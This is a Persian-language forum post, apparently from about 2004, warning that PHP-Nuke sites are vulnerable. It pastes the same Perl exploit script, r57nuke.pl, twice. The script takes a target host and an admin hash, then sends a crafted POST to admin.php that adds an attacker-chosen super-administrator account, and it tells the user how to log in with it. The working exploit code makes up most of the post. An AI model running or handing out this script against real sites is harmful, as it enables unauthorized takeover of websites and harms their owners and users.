ALICIVIL
کاربر تازه وارد
- تاریخ عضویت
- 4 ژانویه 2004
- نوشتهها
- 43
- لایکها
- 1
در سايت مجيد آنلاين هم اين مطلب رو نوشتم. لطفا حد اقل شما ها به فكر چاره باشيد .
دوستان عزيز سلام
همه سايتهاي نوشته شده با ن.ك به اين اكسپلويت جواب ميدن فكر كنم با اين حساب اين سيستم به درد خاله فرانسيسكو بارزي بخوره
يك فايل پرل ميتونه پسورد ادمين رو بيرون بكشه ... خيلي راحت..........
اين نوع هك با استفاده ار SQL Injection انجام ميشه
اين هم فايل پرلش اگه ميتونيد روش كار كنيد اينم ضعف سيستم نوك
#!/usr/bin/perl
# * r57nuke.pl *
# * php-nuke all versions and spaiz-nuke version < 1.2beta xploit *
use IO::Socket;
print "Enter host (e.g. www.phpnuke.com): \r\n";
chomp($server=<STDIN>);
# get new admin nick =)
print "Enter u nick (e.g. hacker): \r\n";
chomp($nick=<STDIN>);
# get new admin pass =)
print "Enter u pass (e.g. password): \r\n";
chomp($pass=<STDIN>);
# get admin hash =)
print "Enter hash (e.g. YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6): \r\n";
chomp($hash=<STDIN>);
$port="80";
$path="/admin.php?op=AddAuthor&add_radminsuper=1&add_name=$nick&add_aid=$nick&[email protected]&add_pwd=$pass&admin=$hash";
print "\r\nConnecting... ";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Photo => tcp)
or die;
print "OK \r\n";
print "exploiting... ";
# send string to server
print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Referer: $server/admin.php\n";
print $socket "User-Agent: r57spaiz\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "OK \r\n";
print "now u can go to $server/admin.php and just use login $nick and password $pass for access \r\n
دوستان عزيز سلام
همه سايتهاي نوشته شده با ن.ك به اين اكسپلويت جواب ميدن فكر كنم با اين حساب اين سيستم به درد خاله فرانسيسكو بارزي بخوره
يك فايل پرل ميتونه پسورد ادمين رو بيرون بكشه ... خيلي راحت..........
اين نوع هك با استفاده ار SQL Injection انجام ميشه
اين هم فايل پرلش اگه ميتونيد روش كار كنيد اينم ضعف سيستم نوك
#!/usr/bin/perl
# * r57nuke.pl *
# * php-nuke all versions and spaiz-nuke version < 1.2beta xploit *
use IO::Socket;
print "Enter host (e.g. www.phpnuke.com): \r\n";
chomp($server=<STDIN>);
# get new admin nick =)
print "Enter u nick (e.g. hacker): \r\n";
chomp($nick=<STDIN>);
# get new admin pass =)
print "Enter u pass (e.g. password): \r\n";
chomp($pass=<STDIN>);
# get admin hash =)
print "Enter hash (e.g. YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6): \r\n";
chomp($hash=<STDIN>);
$port="80";
$path="/admin.php?op=AddAuthor&add_radminsuper=1&add_name=$nick&add_aid=$nick&[email protected]&add_pwd=$pass&admin=$hash";
print "\r\nConnecting... ";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Photo => tcp)
or die;
print "OK \r\n";
print "exploiting... ";
# send string to server
print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Referer: $server/admin.php\n";
print $socket "User-Agent: r57spaiz\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "OK \r\n";
print "now u can go to $server/admin.php and just use login $nick and password $pass for access \r\n
h34r: اين هم خطاب به جناب هكر عزيز === زياد به خودتون نباليد شما حتي نمي تونيد 2 سطر از اين اسكريپتهايي كه باهاش كار ميكنيد رو بنويسيد بلكه دارين از تبحر و استعداد يه عده ديگه كه هدفشون نمايش ضعف هاي سيستم بوده سو’ استفاده ميكنيد. به اميد ديدار............
